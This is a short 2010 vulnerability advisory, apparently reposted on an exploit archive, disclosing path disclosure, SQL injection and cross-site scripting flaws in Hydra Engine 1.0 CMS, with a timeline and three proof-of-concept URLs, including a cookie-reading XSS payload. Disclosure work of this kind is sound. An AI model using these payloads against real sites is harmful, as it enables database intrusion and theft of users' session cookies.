Home / os / winme

Hydra CMS Cross Site Scripting / SQL Injection Vulnerabiliti

Posted on 11 March 2010

============================================================== Hydra CMS Cross Site Scripting / SQL Injection Vulnerabilities ============================================================== Hello Full-Disclosure! I want to warn you about vulnerabilities in Hydra Engine. It's commercial Ukrainian CMS. ----------------------------- Timeline: 26.08.2009 - found the vulnerabilities. 28.08.2009 - announced at my site. 09.09.2009 - informed developers. 30.01.2010 - disclosed at my site. ----------------------------- Details: These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure: http://site/search/�/ SQL Injection: http://site/search/'%20and%20version()%3E5--%20/ XSS: http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/ Vulnerable is Hydra Engine 1.0. Best wishes & regards, MustLive # ~ - [ [ : Inj3ct0r : ] ]

 

TOP